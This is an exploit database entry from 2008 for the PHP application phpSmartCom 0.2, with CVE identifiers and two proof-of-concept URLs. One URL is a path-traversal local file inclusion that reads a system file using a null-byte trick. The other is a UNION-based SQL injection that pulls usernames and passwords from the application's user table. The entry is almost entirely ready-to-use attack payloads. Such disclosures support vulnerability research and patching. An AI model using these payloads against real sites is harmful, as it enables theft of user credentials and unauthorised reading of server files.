[] NeoSense

phpsmartcom 0.2 - Local File Inclusion / SQL Injection

Author: r3dm0v3
type: webapps
platform: php
port: 
date_added: 2008-09-12 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-48669;CVE-2008-4352;OSVDB-48668;CVE-2008-4351 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpSmartCom0.2.zip

 fphpSmartCom v. 0.2 Local File Inclusion , SQL Injection Vuln

Download : http://sourceforge.net/projects/phpsmartcom/

Local File Inclusion:
http://127.0.0.1/phpsmartcom/index.php?p=../../../../../boot.ini%00

SQL Injection:
http://localhost/phpsmartcom/index.php?p=viewprofile&uid=1'+union+select+1,uname,3,upwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+psc_users+where+uid=1+limit+1,1/*

Credits : Neo , R3dm0v3

# milw0rm.com [2008-09-13]